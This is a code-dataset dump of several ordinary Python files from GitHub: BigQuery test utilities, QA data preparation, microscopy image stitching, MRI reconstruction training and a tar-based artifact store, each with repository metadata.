constants.bq_client.create_dataset(\n dataset=dataset,\n exists_ok=False)\n\n\ndef list_tables():\n tables = list(constants.bq_client.list_tables(constants.dataset_id))\n table_names = sorted([t.table_id for t in tables])\n return table_names\n", "repo_name": "augustin-barillec/bigquery-operator", "sub_path": "tests/utils/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tests.utils.constants.bq_client.get_dataset", "line_number": 6, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 6, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 6, "usage_type": "attribute"}, {"api_name": "google.cloud.exceptions.NotFound", "line_number": 13, "usage_type": "attribute"}, {"api_name": "google.cloud.exceptions", "line_number": 13, "usage_type": "name"}, {"api_name": "tests.utils.constants.bq_client.delete_dataset", "line_number": 18, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 18, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 19, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.Dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 25, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 25, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_location", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 26, "usage_type": "name"}, {"api_name": "tests.utils.constants.bq_client.create_dataset", "line_number": 27, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 27, "usage_type": "name"}, {"api_name": "tests.utils.constants.bq_client.list_tables", "line_number": 33, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 33, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "74149516005", "text": "import json\nimport random\nfrom itertools import chain\nfrom random import sample, shuffle\nimport os\n\nimport nltk\nimport pandas as pd\n\nrandom.seed(42)\n\n\ndef save_result_on_disk(all_df, result_dic, cache_path, dataset_name, method, task):\n folder_dir = os.path.join(cache_path, dataset_name, method)\n print('save file in {}'.format(folder_dir))\n df = pd.concat(all_df)\n if not os.path.isdir(folder_dir):\n os.makedirs(folder_dir)\n\n cache_file = os.path.join(folder_dir, method + '.{}.csv'.format(task))\n res_file = os.path.join(folder_dir, method + '.{}.json'.format(task))\n # save rankings\n df.to_csv(cache_file, index=False)\n # save results\n json.dump(result_dic, open(res_file, 'w'), indent=4)\n\n\ndef cache_exist(cache_path, dataset_name, method, task):\n cache_file = os.path.join(cache_path, dataset_name, method, method + '.{}.csv'.format(task))\n if os.path.isfile(cache_file):\n all_df = [t[1] for t in pd.read_csv(cache_file).groupby('chapter')]\n return all_df\n else:\n return []\n\n\ndef pretty_print_results(cache_path, dataset_name, method, task):\n folder_dir = os.path.join(cache_path, dataset_name, method)\n result_file = os.path.join(folder_dir, method + '.{}.json'.format(task))\n all_results = json.load(open(result_file))\n for item in all_results.items():\n print(item)\n\n\ndef read_json_file(file_path):\n with open(file_path) as outfile:\n data = json.load(outfile)\n return data\n\n\ndef _sample_nagatives(pos_sample, neg_sample, factor=2):\n \"\"\"A naive negative sampling\"\"\"\n return sample(neg_sample, k=min(len(pos_sample) * factor, len(neg_sample)))\n\n\ndef extract_paragraph_pointwise(train_file_path, dataset_name, split, negative_samples_factor):\n data = read_json_file(train_file_path)\n if dataset_name == 'tqa':\n all_data = []\n for c in data:\n positive_labels = [s['ground_sentence'] for s in c['questions']]\n all_sentences = list(chain(*[nltk.tokenize.sent_tokenize(p) for p in c['chapter_text_list']]))\n negative_labels = [s for s in all_sentences if s not in positive_labels]\n\n pos_para = [(pl, 1) for pl in positive_labels]\n neg_para = [(nl, 0) for nl in negative_labels]\n\n if split == \"train\":\n neg_para = _sample_nagatives(pos_para, neg_para, factor=negative_samples_factor)\n # sample(neg_para, k=min(len(pos_para) * 2, len(neg_para)))\n\n all_data.append(pos_para)\n all_data.append(neg_para)\n\n all_data = list(chain(*all_data))\n if split == 'train':\n shuffle(all_data)\n return all_data\n\n elif dataset_name == 'openstax':\n all_data = []\n for c in data:\n positive_labels = []\n for q in c['questions']:\n for aligned_p in q['aligned_paragraphs']:\n if aligned_p.get('annotation'):\n tmp = [item for item in aligned_p['annotation'].items() if item[1][0] != 'no_support']\n if len(tmp) > 0:\n positive_labels.append(aligned_p)\n\n pos_para = set([p['paragraph_num'] for p in positive_labels])\n neg_para = set(list(range(len(c['tokenized_chapter_text'])))).difference(set(pos_para))\n\n pos_txt = [(\" \".join(\" \".join(item) for item in c['tokenized_chapter_text'][pp]), 1) for pp in pos_para]\n neg_txt = [(\" \".join(\" \".join(item) for item in c['tokenized_chapter_text'][pp]), 0) for pp in neg_para]\n if split == 'train':\n if negative_samples_factor != -1:\n neg_txt = _sample_nagatives(pos_txt, neg_txt, factor=negative_samples_factor)\n\n all_data.append(pos_txt)\n all_data.append(neg_txt)\n all_data = list(chain(*all_data))\n if split == 'train':\n shuffle(all_data)\n return all_data\n else:\n raise Exception('dataset not found ...')\n", "repo_name": "hadifar/content_selection", "sub_path": "xSQuAD/helper_fn.py", "file_name": "helper_fn.py", "file_ext": "py", "file_size_in_byte": 3996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 40, "usage_type": "call"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 53, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.tokenize", "line_number": 62, "usage_type": "attribute"}, {"api_name": "itertools.chain", "line_number": 75, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 77, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 102, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "27332534372", "text": "'''\nStitch\n- Combine all field images into one image\n'''\n\nimport numpy as np\nimport cv2 as cv\nimport os\n\n\ndef readImages(dataDir): #, wells, positions, channels, timePoints, fields):\n # edit:\n # - take image file format as input. File formats change.\n # - take well layout as e.g. (04, 04)\n # - take the number of positions and create a list with names to iterate through\n # - take the number of channels and create a list with names to iterate through\n # - take the number of timePoints and create a list with the names to iterate through\n # - make it so general that the user can add whatever variables they desire (positions, channels, timePoints)\n # and the program would create the list for reading.\n # - or consider if all files should be read, irrespective of the name and organised as they come.\n # the core of the last 2 points is: does the image data need a data structure, or is a list with indexes of the contents?\n # it depends on how the user wants to process the data\n\n '''\n Purpose: To read all files of the imaging experiment\n\n Input:\n - wells = a list of tuples with the well's row and column numbers in text format,\n - positions = an integer quantity of the z positions that each well was imaged at,\n - channels = the number of imaging channels used for the imaging experiment,\n - fields = an integer quantity of the subfields imaged per well.\n\n Output:\n - imgs_all_wells = a nested list of images of each well subdivided by fields, captured at different z\n positions and with different channels (shape = wells x positions x channels x fields)\n '''\n\n\n '''\n 1. Read images in stitching order\n\n '''\n\n # # Stitching order\n # fields_25_stitching_order = ['02', '03', '04', '05', '06',\n # '11', '10', '09', '08', '07',\n # '12', '13', '01', '14', '15',\n # '20', '19', '18', '17', '16',\n # '21', '22', '23', '24', '25' ]\n # fields_25_rows = 5\n #\n # fields_9_stitching_order = ['02', '03', '04',\n # '06', '01', '05',\n # '07', '08', '09']\n #\n # # using positions\n # fields_6_stitching_order = ['02', '01', '03',\n # '06', '05', '04']\n #\n # fields_9_rows = 3\n #\n # if fields == 6:\n # stitching_order = fields_6_stitching_order\n # elif fields == 9:\n # stitching_order = fields_9_stitching_order\n # elif fields == 25:\n # stitching_order = fields_25_stitching_order\n # elif fields == 1:\n # stitching_order = ['01']\n #\n # channel_names = ['1', '2', '3', '4']\n # position_names = ['01', '02', '03', '04', '05',\n # '06', '07', '08', '09', '10',\n # '11', '12', '13', '14', '15']\n # timePoint_names = ['1', '2', '3', '4'] # for however long there are timepoints\n #\n # # Reading images\n # imgs_all_wells = [] # dimensions: wells x positions x channels x time x fields\n #\n # for well in range(len(wells)):\n # # imgs_one_well_all_channels = [] # channels x fields\n # imgs_one_well_all_positions_channels_and_times = [] # dimensions: positions x channels x time x fields\n #\n # for position in range(positions):\n # imgs_one_well_position_all_channels_and_times = [] # dimensions: channels x time x fields\n #\n # for channel in range(channels):\n # imgs_one_channel_all_times_and_fields = [] # dimensions: time x fields\n #\n # for timePoint in range(timePoints):\n # imgs_one_timePoint_all_fields = [] # dimensions: fields\n #\n # for field in range(len(stitching_order)):\n # # cv.IMREAD_GRAYSCALE allows a 16-bit image to remain as 16-bit\n # imgs_one_timePoint_all_fields.append(cv.imread(dir +\n # '/r' + wells[well][0] +\n # 'c' + wells[well][1] +\n # 'f' + stitching_order[field] +\n # 'p' + position_names[position] +\n # '-ch' + channel_names[channel] +\n # 'sk' + timePoint_names[timePoint] +\n # 'fk1fl1.tif', cv.IMREAD_ANYDEPTH))\n # # at the end of each time point\n # imgs_one_channel_all_times_and_fields.append(imgs_one_timePoint_all_fields)\n #\n # # at the end of each channel\n # imgs_one_well_position_all_channels_and_times.append(imgs_one_channel_all_times_and_fields)\n #\n # # at the end of each well position\n # imgs_one_well_all_positions_channels_and_times.append(imgs_one_well_position_all_channels_and_times)\n #\n # # at the end of each well\n # imgs_all_wells.append(imgs_one_well_all_positions_channels_and_times)\n\n print(\"\\nReading data...\")\n\n # > Get the names and extensions of the image files in the directory, sort alphabetically\n inputImagesNames = sorted(os.listdir(dataDir))\n\n # > Create directory paths for each image file\n imagePaths = [dataDir + '/' + imageName for imageName in inputImagesNames]\n\n # > Read images\n inputImages = [cv.imread(imagePath, cv.IMREAD_GRAYSCALE) for imagePath in imagePaths]\n\n print(\"Finished reading data.\")\n\n print(\"\\nThere is/are in total \" + str(len(inputImagesNames)) + \" image(s).\")\n\n return inputImages, inputImagesNames\n\n\ndef stitch(unstitched_images, wells, positions, channels, fields):\n '''\n Function: To merge the different subfield images of one well into one image\n\n Input:\n - images_of_all_wells = a nested list of images of each well subdivided by fields, captured at different z\n positions and with different channels (shape = wells x positions x channels x fields),\n - wells = a list of tuples with the well's row and column numbers in text format,\n - positions = an integer quantity of the z positions that each well was imaged at,\n - channels = the number of imaging channels used for the imaging experiment,\n - fields = an integer quantity of the subfields imaged per well.\n\n Output:\n - normalised fields of a well\n '''\n\n \"\"\"\n 25 fields List order = [0, 1, 2, 3, 4,\n 5, 6, 7, 8, 9,\n 10, 11, 12, 13, 14,\n 15, 16, 17, 18, 19,\n 20, 21, 22, 23, 24 ]\n \"\"\"\n\n \"\"\"\n 9 fields List order = [ 0, 1, 2,\n 3, 4, 5,\n 6, 7, 8]\n \"\"\"\n\n stitched_imgs = [] # wells x positions x channels\n\n for well in range(len(wells)):\n stitched_imgs_one_well_all_z_positions_and_channels = [] # positions x channels\n\n for position in range(positions):\n stitched_imgs_at_one_well_position_for_all_channels = [] # channels\n\n for channel in range(channels):\n\n # Stitch columns, then stitch rows\n if fields == 6:\n first_row = np.concatenate((unstitched_images[well][position][channel][0],\n unstitched_images[well][position][channel][1],\n unstitched_images[well][position][channel][2]), axis=1)\n second_row = np.concatenate((unstitched_images[well][position][channel][3],\n unstitched_images[well][position][channel][4],\n unstitched_images[well][position][channel][5]), axis=1)\n\n # at the end of each channel, store the stitched image\n stitched_imgs_at_one_well_position_for_all_channels.append(np.concatenate((first_row, second_row), axis=0))\n\n elif fields == 25:\n first_row = np.concatenate((unstitched_images[well][position][channel][0],\n unstitched_images[well][position][channel][1],\n unstitched_images[well][position][channel][2],\n unstitched_images[well][position][channel][3],\n unstitched_images[well][position][channel][4]), axis=1)\n second_row = np.concatenate((unstitched_images[well][position][channel][5],\n unstitched_images[well][position][channel][6],\n unstitched_images[well][position][channel][7],\n unstitched_images[well][position][channel][8],\n unstitched_images[well][position][channel][9]), axis=1)\n third_row = np.concatenate((unstitched_images[well][position][channel][10],\n unstitched_images[well][position][channel][11],\n unstitched_images[well][position][channel][12],\n unstitched_images[well][position][channel][13],\n unstitched_images[well][position][channel][14]), axis=1)\n fourth_row = np.concatenate((unstitched_images[well][position][channel][15],\n unstitched_images[well][position][channel][16],\n unstitched_images[well][position][channel][17],\n unstitched_images[well][position][channel][18],\n unstitched_images[well][position][channel][19]), axis=1)\n fifth_row = np.concatenate((unstitched_images[well][position][channel][20],\n unstitched_images[well][position][channel][21],\n unstitched_images[well][position][channel][22],\n unstitched_images[well][position][channel][23],\n unstitched_images[well][position][channel][24]), axis=1)\n\n # at the end of each channel, store\n stitched_imgs_at_one_well_position_for_all_channels.append(\n np.concatenate((first_row, second_row, third_row, fourth_row, fifth_row), axis=0))\n\n # at the end of each well position, store the 4 channel stitched images\n stitched_imgs_one_well_all_z_positions_and_channels.\\\n append(stitched_imgs_at_one_well_position_for_all_channels)\n\n # at the end of each well\n stitched_imgs.append(stitched_imgs_one_well_all_z_positions_and_channels)\n\n return stitched_imgs\n\n\ndef export_imgs(imgs, dir, wells, channels, positions):\n\n position_names = ['01', '02', '03', '04', '05',\n '06', '07', '08', '09', '10',\n '11', '12', '13', '14', '15']\n\n for well in range(len(wells)):\n for position in range(positions):\n for channel in range(channels):\n # Export\n file_name = '/well-' + str(wells[well]) + '-p' + position_names[position] + '-channel-' + str(channel + 1) + '.png'\n cv.imwrite(dir + file_name, imgs[well][position][channel])\n\n\nif __name__ == '__main__':\n # plates_input_dir = ['/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-1__2022-12-23T10_46_22-Measurement-1/export-ij',\n # '/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-2__2022-12-23T09_41_33-Measurement-1/export-ij']\n # plates_export_dir = ['/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-1__2022-12-23T10_46_22-Measurement-1/stitched_enhanced',\n # '/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-2__2022-12-23T09_41_33-Measurement-1/stitched_enhanced']\n\n fields = 6\n import_dir = ' '\n export_dir = ' '\n wells = [('02', '02')]\n experiment = 'drug_screen_april-05'\n positions = 1\n channels = 1\n time_points = 0\n if experiment == 'drug_screen_april-05':\n fields = 25\n import_dir = '/home/franz/Documents/mep/data/organoid-images/drug-screen-april-05/Images'\n export_dir = '/home/franz/Documents/mep/data/organoid-images/drug-screen-april-05/stitched-Images'\n wells = [('02', '02'), ('02', '03'), ('02', '04'), ('02', '05'), ('02', '06'), ('02', '07'), ('02', '08'),\n ('03', '02'), ('03', '03'), ('03', '04'), ('03', '05'), ('03', '06'), ('03', '07'), ('03', '08'),\n ('04', '02'), ('04', '03'), ('04', '04'), ('04', '05'), ('04', '06'), ('04', '07'), ('04', '08'),\n ('05', '11'), ('06', '11'), ('07', '11')]\n positions = 1\n channels = 1\n elif experiment == 'staining_experiment_2':\n wells = [('02', '02')]\n\n\n all_imgs = read_images(import_dir, wells, positions, channels, fields)\n stiched_imgs = stitch(all_imgs, wells, positions, channels, fields)\n export_imgs(stiched_imgs, export_dir, wells, channels, positions)\n", "repo_name": "ErasmusMC-Bioinformatics/OrganoTrack", "sub_path": "Building-OrganoTrack-functionalities/Stitching-field-images/stitch.py", "file_name": "stitch.py", "file_ext": "py", "file_size_in_byte": 14028, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 124, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 214, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 237, "usage_type": "call"}]} +{"seq_id": "29597302040", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom Unet_model_fast_mri import Unet\n#import two_channel_dataset_test\nfrom data.base_dataset import BaseDataset, get_transform\nfrom data.image_folder import make_dataset\nfrom PIL import Image\nimport random\nimport scipy.io as sp\nfrom util.util import generate_mask_alpha, generate_mask_beta\nimport scipy.ndimage\nfrom util.util import fft2, ifft2, cplx_to_tensor, complex_conj, complex_matmul, absolute\nfrom util.image_pool import ImagePool\n#from models.base_model import BaseModel\nfrom models import networks\nfrom models.networks import UnetGenerator\nfrom util.metrics import PSNR, roll_2\n#import pytorch_msssim\nfrom util.hfen import hfen\nimport global_network_dataset\nfrom util.util import convert_2chan_into_complex, init_weights\n#from models.didn import DIDN\n \ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nnetG = Unet(2,2, num_pool_layers=4,chans=64).to(device)\n\n\n\ninit_weights(netG, init_type='normal',init_gain=0.02)\nnetG = netG.float().to(device)\nnorm = nn.L1Loss().to(device)\n# Loss and optimizer\nlearning_rate = 1e-4\nepoch = 150\ncg_iter =6\nfn = nn.MSELoss().to(device)\noptimG = torch.optim.Adam(netG.parameters(), lr=learning_rate)\ntrain_loss = []\nvali_loss = []\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimG, milestones=[50,100], gamma=0.6)\n\ndef CG(output, tol ,L, smap, mask, alised_image):\n return networks.CG.apply(output, tol ,L, smap, mask, alised_image)\n\nPSNR_list =[]\ntrain_loss= []\nvali_loss =[]\n\n\n\nfor epoch in range(epoch):\n loss_G_train = 0\n for direct, target,smap,mask in global_network_dataset.train_loader: \n input = direct.to(device).float()\n smap = smap.to(device).float()\n mask = mask.to(device).float()\n label = target.to(device).float()\n temp = input\n for ii in range(cg_iter):\n output = netG(temp)\n output2 = CG(output, tol =0.00001,L= 0.1, smap=smap, mask= mask, alised_image= input)\n temp = output2\n output_final = temp\n optimG.zero_grad()\n loss_G = fn(output_final, label)\n loss_G.backward()\n optimG.step()\n loss_G_train += float(loss_G) \n with torch.no_grad():\n vali_loss_total = 0\n for vali_direct, vali_target,vali_smap,vali_mask in global_network_dataset.test_loader:\n vali_input = vali_direct.to(device).float()\n vali_smap = vali_smap.to(device).float()\n vali_mask = vali_mask.to(device).float()\n vali_label = vali_target.to(device).float()\n vali_temp = vali_input\n for jj in range(cg_iter):\n vali_output = netG(vali_temp)\n vali_output2 = CG(vali_output, tol =0.00001,L= 0.1, smap=vali_smap, mask= vali_mask, alised_image= vali_input)\n vali_temp = vali_output2\n vali_result = vali_temp\n Loss_vail = fn(vali_result,vali_label)\n vali_loss_total += float(Loss_vail)\n train_loss.append(loss_G_train/2000)\n vali_loss.append(vali_loss_total/5)\n print('V Loss',vali_loss_total/5)\n print(loss_G_train/2800)\n print(epoch)\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "sjames40/Multi_coil_local_model", "sub_path": "multi_coil_global_MODL/train_global_network.py", "file_name": "train_global_network.py", "file_ext": "py", "file_size_in_byte": 3191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Unet_model_fast_mri.Unet", "line_number": 27, "usage_type": "call"}, {"api_name": "util.util.init_weights", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.networks.CG.apply", "line_number": 45, "usage_type": "call"}, {"api_name": "models.networks.CG", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.networks", "line_number": 45, "usage_type": "name"}, {"api_name": "global_network_dataset.train_loader", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 71, "usage_type": "call"}, {"api_name": "global_network_dataset.test_loader", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "28488537744", "text": "import os\nimport uuid\n\nimport logging\nimport time\nimport tempfile\nimport re\nfrom threading import Thread\nimport subprocess\nimport shutil\n\n\nimport fs_tracker\nimport util\nimport tarfile\nimport urllib\n\nlogging.basicConfig()\n\n\nclass TartifactStore(object):\n\n def __init__(self, measure_timestamp_diff=True):\n\n if measure_timestamp_diff:\n try:\n self.timestamp_shift = self._measure_timestamp_diff()\n except BaseException:\n self.timestamp_shift = 0\n else:\n self.timestamp_shift = 0\n\n def _measure_timestamp_diff(self):\n\n max_diff = 60\n\n tmpfile = os.path.join(\n tempfile.gettempdir(), str(\n uuid.uuid4()) + '.txt')\n with open(tmpfile, 'w') as f:\n f.write('timestamp_diff_test')\n key = 'tests/' + str(uuid.uuid4())\n self._upload_file(key, tmpfile)\n remote_timestamp = self._get_file_timestamp(key)\n\n if remote_timestamp is not None:\n\n now_remote_diff = time.time() - remote_timestamp\n self._delete_file(key)\n os.remove(tmpfile)\n\n assert -max_diff < now_remote_diff and \\\n now_remote_diff < max_diff, \\\n \"Timestamp difference is more than 60 seconds. \" + \\\n \"You'll need to adjust local clock for caching \" + \\\n \"to work correctly\"\n\n return -now_remote_diff if now_remote_diff < 0 else 0\n\n def put_artifact(\n self,\n artifact,\n local_path=None,\n cache=True,\n background=False):\n if local_path is None:\n local_path = artifact['local']\n\n key = artifact.get('key')\n if os.path.exists(local_path):\n tar_filename = os.path.join(tempfile.gettempdir(),\n str(uuid.uuid4()))\n\n if os.path.isdir(local_path):\n local_basepath = local_path\n local_nameonly = '.'\n else:\n local_nameonly = os.path.basename(local_path)\n local_basepath = os.path.dirname(local_path)\n\n if cache and key:\n cache_dir = fs_tracker.get_artifact_cache(key)\n if cache_dir != local_path:\n self.logger.debug(\n \"Copying local path {} to cache {}\"\n .format(local_path, cache_dir))\n\n if os.path.exists(cache_dir) and os.path.isdir(cache_dir):\n shutil.rmtree(cache_dir)\n\n pcp = subprocess.Popen(\n ['cp', '-pR', local_path, cache_dir],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n cpout, _ = pcp.communicate()\n if pcp.returncode != 0:\n self.logger.info(\n 'cp returned non-zero exit code. Output:')\n self.logger.info(cpout)\n\n self.logger.debug(\n (\"Tarring and uploading directrory. \" +\n \"tar_filename = {}, \" +\n \"local_path = {}, \" +\n \"key = {}\").format(\n tar_filename,\n local_path,\n key))\n\n tarcmd = 'tar -czf {} -C {} {}'.format(\n tar_filename,\n local_basepath,\n local_nameonly)\n\n self.logger.debug(\"Tar cmd = {}\".format(tarcmd))\n\n tarp = subprocess.Popen(['/bin/bash', '-c', tarcmd],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n tarout, _ = tarp.communicate()\n if tarp.returncode != 0:\n self.logger.info('tar had a non-zero return code!')\n self.logger.info('tar output: \\n ' + tarout)\n\n if key is None:\n key = 'blobstore/' + util.sha256_checksum(tar_filename) \\\n + '.tgz'\n\n def finish_upload():\n self._upload_file(key, tar_filename)\n\n os.remove(tar_filename)\n\n t = Thread(target=finish_upload)\n t.start()\n\n if background:\n return (key, t)\n else:\n t.join()\n return key\n else:\n self.logger.debug((\"Local path {} does not exist. \" +\n \"Not uploading anything.\").format(local_path))\n\n def get_artifact(\n self,\n artifact,\n local_path=None,\n only_newer=True,\n background=False):\n\n key = artifact['key']\n\n if local_path is None:\n if 'local' in artifact.keys() and \\\n os.path.exists(artifact['local']):\n local_path = artifact['local']\n else:\n if artifact['mutable']:\n local_path = fs_tracker.get_artifact_cache(key)\n else:\n local_path = fs_tracker.get_blob_cache(key)\n\n local_path = re.sub('\\/\\Z', '', local_path)\n local_basepath = os.path.dirname(local_path)\n\n self.logger.info(\"Downloading dir {} to local path {} from storage...\"\n .format(key, local_path))\n\n if only_newer and os.path.exists(local_path):\n self.logger.debug(\n 'Comparing date of the artifact in storage with local')\n storage_time = self._get_file_timestamp(key)\n local_time = os.path.getmtime(local_path)\n if storage_time is None:\n self.logger.info(\n \"Unable to get storage timestamp, storage is either \" +\n \"corrupted and has not finished uploading\")\n return local_path\n\n if local_time > storage_time - self.timestamp_shift:\n self.logger.info(\n \"Local path is younger than stored, skipping the download\")\n return local_path\n\n tar_filename = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))\n self.logger.debug(\"tar_filename = {} \".format(tar_filename))\n\n def finish_download():\n self._download_file(key, tar_filename)\n if os.path.exists(tar_filename):\n # first, figure out if the tar file has a base path of .\n # or not\n self.logger.info(\"Untarring {}\".format(tar_filename))\n listtar, _ = subprocess.Popen(['tar', '-tzf', tar_filename],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n ).communicate()\n listtar = listtar.strip().split('\\n')\n self.logger.info('List of files in the tar: ' + str(listtar))\n if listtar[0].startswith('./'):\n # Files are archived into tar from .; adjust path\n # accordingly\n basepath = local_path\n else:\n basepath = local_basepath\n\n tarcmd = ('mkdir -p {} && ' +\n 'tar -xzf {} -C {} --keep-newer-files') \\\n .format(basepath, tar_filename, basepath)\n tarp = subprocess.Popen(\n ['/bin/bash', '-c', tarcmd],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n tarout, tarerr = tarp.communicate()\n if tarp.returncode != 0:\n self.logger.info('tar had a non-zero return code!')\n self.logger.info('tar cmd = ' + tarcmd)\n self.logger.info('tar output: \\n ' + tarout)\n\n if len(listtar) == 1:\n actual_path = os.path.join(basepath, listtar[0])\n self.logger.info(\n 'Renaming {} into {}'.format(\n actual_path, local_path))\n os.rename(actual_path, local_path)\n os.remove(tar_filename)\n else:\n self.logger.warn(\n 'file {} download failed'.format(tar_filename))\n\n t = Thread(target=finish_download)\n t.start()\n if background:\n return (local_path, t)\n else:\n t.join()\n return local_path\n\n def get_artifact_url(self, artifact):\n if 'key' in artifact.keys():\n return self._get_file_url(artifact['key'])\n return None\n\n def delete_artifact(self, artifact):\n if 'key' in artifact.keys():\n self._delete_file(artifact['key'])\n\n def stream_artifact(self, artifact):\n url = self.get_artifact_url(artifact)\n if url is None:\n return None\n\n fileobj = urllib.urlopen(url)\n if fileobj:\n try:\n retval = tarfile.open(fileobj=fileobj, mode='r|gz')\n return retval\n except BaseException as e:\n self.logger.info('Streaming artifact error:\\n' + e.message)\n return None\n", "repo_name": "FrazerBayley/studio", "sub_path": "studio/tartifact_store.py", "file_name": "tartifact_store.py", "file_ext": "py", "file_size_in_byte": 9235, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, 